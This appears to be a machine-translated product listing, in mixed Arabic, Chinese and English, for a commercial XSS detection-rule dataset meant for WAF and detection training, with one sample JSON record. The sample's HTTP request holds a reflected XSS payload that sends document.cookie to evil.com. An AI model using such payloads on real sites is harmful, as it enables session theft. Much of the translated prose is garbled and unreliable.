لمحة عامة عن البيانات
التعريف:XSS跨站脚本检测规则数据集مقدم منشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةبيانات عالية الجودة عن اختبار السلامة على الشبكة التي تبنىها مختبرات الأمن كل جزء من البيانات يعرف بـقواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية"التشكيل الـ 5 الأبعاد للجمعيات، الذي يغطي المُعاكس، التخزين، إدارة الشؤون الإدارية، الطفرة، مركز خدمات الدعم المركزية، والنموذج الفرعي الرئيسي الخامس،WAF التناجيكي(Code bypassing/case-scraping/label split/incident mutation, etc.), ATTCK framework T1189 (pass-attack) map, specially designed for WAF/ISS XSS testing rules training and XSS testing AI training design.
| اسم البيانات | XSS跨站脚本检测规则数据集 |
| مجموع حجم البيانات | 1,000~30,000条 |
| نوع البيانات | خمسة:قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية |
| المصدر | 朗慧安全实验室 + 漏洞平台验证数据 |
| نوع الترخيص | التراخيص التجارية مرفق وثائق التفويض الكاملة |
| دورة التسليم | 2-4 أسابيع |
| النموذج الفرعي للبرمجيات المنسَّقة | Refractioned, storage XSS (Stored/Persistent), DOM-based, mXSS (Mattered XSS), CSS Injection |
| بطاقة جواز السفر | :: إدراج بطاقات المهارات التي تستخدمها القوات المسلحة اللبنانية (تجسيد الالتباس/التشويش على الحالات/التشويش على العلام/الاختلال في برنامج العلاج بالأحداث/الأحداث العرضية) |
| ATTCK Mapping | T1189(Drive-by Compromise)、T1059(Command and Scripting Interpreter) |
| الناتج | JSONL / CSV / Excel / PCAP |
| اللغة | اللغة الصينية والإنكليزية |
مجالات البيانات الأساسية
وتتضمن كل بيانات ست فئات رئيسية من العلامات على القواعد، وقواعد الكشف عن الألغام غير المنفجرة، والهجوم على الحمولة (بتقنيات الالتفاف)، ونص برنامج نقل التكنولوجيا المتقدمة، وتدفقات برنامج العمل الخاص بالمناطق الجغرافية، والردود الموحدة، التي تغطي السلسلة الكاملة من تعريف القواعد إلى التفاف على المواجهة.
| الفئة الميدانية | العدة الميدانية | المجالات النموذجية |
|---|---|---|
| تعريف القاعدة | 4 | القاعدة (د) (التعريف الوحيد للقواعد)، القاعدة (اسم القواعد)، الفئة (النموذج الفرعي لدائرة خدمات الأمن المُحدّد)، الشدة (المستوى الفظي: CC/High/Medium) |
| XML Detection Rules | 3 | القاعدة xml (قاعدة مورس الأمن/CRS XML)، القاعدة / التوقيع (التوقيع على القواعد/الطريقة العادية)، القاعدة / الوصف (مذكرة القواعد) |
| 攻击Payload | 4 | حمولة (حمولة أولية)، حمولة - نوع (نوع الحمولة)، ورسوم المرور - التقني (تقنيات الترميز: الطفرة المشفرة/الطحالب/الموزعة/الرسوم، إلخ)، حمولة حمولة - تشفير (الرمز: URL/HTML Enterity/Hex/base64/UTF-7، وما إلى ذلك) |
| HTTP Reconstructed Text | 3 | http_request (full HTTP request, including Headers+Body+Ckys), http_response (full HTTP response), context (injecting context: HTML body/attribute/JavaScript/CSSS/URL) |
| حركة المرور | 4 | pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名) |
| الحقيقة الأرضية | 4 | (سواء كان الهجوم: صحيح/محل)، الهجوم - نوع (نوع الهجوم)، التجاوز - المفقود (سواء كان التجاوز قد تجاوز بنجاح)، واو - لقب (ويلدي WAF الاسم/None) |
عرض عينات البيانات
وفيما يلي نموذج نموذجي (بعلامات تبويب) لبيانات اختبار المسار الخامس لنموذج MSS (S) بالنسبة لعينة " JSON " الهيكلية المُضللة.
{
"entry_id": "XSS-2024-001523",
"rule_id": "XSS-REFLECT-0089",
"rule_name": "Reflected XSS Detection - Script Tag",
"category": "Reflected XSS",
"severity": "Critical",
"rule_xml": "\n detectXSS \n block \n \n ARGS|REQUEST_BODY \n ",
"payload": "",
"payload_type": "Reflected XSS - Cookie Theft",
"bypass_technique": "None (standard script tag injection)",
"payload_encoding": "None (plaintext)",
"http_request": "GET /search?q=%3Cscript%3Efetch('https://evil.com/steal%3Fcookie%3D'%2Bdocument.cookie)%3C/script%3E HTTP/1.1\r\nHost: vulnerable-blog.com\r\nUser-Agent: Mozilla/5.0\r\nReferer: https://vulnerable-blog.com/\r\n\r\n",
"http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 315\r\n\r\n...نتائج البحث: < scriptgt; fitch(...) </scriptgt;...",
"context": "HTML body - reflected search term",
"pcap_info": {
"pcap_file": "xss_reflected_script_tag_20240422.pcap",
"pcap_md5": "a1b2c3d4e5f678901234567890abcdef",
"pcap_size": "5678",
"flow_signature": "HTTP GET with ...